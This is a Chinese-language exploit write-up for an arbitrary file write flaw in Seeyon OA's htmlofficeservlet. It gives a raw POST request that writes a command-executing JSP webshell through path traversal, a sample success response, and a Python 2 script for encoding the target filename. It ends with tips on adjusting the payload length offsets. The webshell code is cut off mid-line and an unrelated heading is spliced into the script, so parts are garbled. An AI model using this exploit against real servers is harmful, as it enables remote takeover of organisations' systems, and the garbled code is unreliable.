致远OAhtmlofficeservlet任意⽂件写⼊漏洞
0x00 影响版本:
致远A8-V5协同管理软件V6.1sp1
致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3
致远A8+协同管理软件V7.1
0x01 检查漏洞是否存在:
访问 /seeyon/htmlofficeservlet
显⽰结果:
DBSTEP V3.0 0 21 0 htmoffice operate err
0x02 EXP
POST /seeyon/htmlofficeservlet HTTP/1.1
Content-Length: 1121
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: xxxxxxxxx
Pragma: no-cache
DBSTEP V3.0    355            0              666            DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime().exec(c);BufferedReader buf = new BufferedReade 成功响应:
DBSTEP V3.0    386            0              666            DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
CLIENTIP=wLCXqUKAP7uhw4g5zi=6
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime().exec(c);BufferedReader buf = new BufferedReade 0x03 上传⽂件名加解密脚本
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
# ..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\test123456.jsp
import base64
a = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
b = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6"
out = ""
c = input("\n1.加密  2.解密  0.退出\n\n请选择处理⽅式:")
while c != 0:
out = ""
if c == 1:
str = raw_input("\n请输⼊要处理的字符串:")
str = base64.b64encode(str)
for i in str:
out += b[a.index(i)]springframework远程代码执行漏洞
print("\n处理结果为:"+out)
elif c == 2:
str = raw_input("\n请输⼊要处理的字符串:")
for i in str:
out += a[b.index(i)]
out = base64.b64decode(out)
print("\n处理结果为:"+out)
else:
print("\n输⼊有误!!只能输⼊“1”和“2”,请重试!")
c = input("\n1.加密  2.解密  0.退出\n\n请选择处理⽅式:")
修改webshell信息还需要修改355和666参数:
355为从哪⾥开始读源码,666为写⼊的webshell源码长度

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。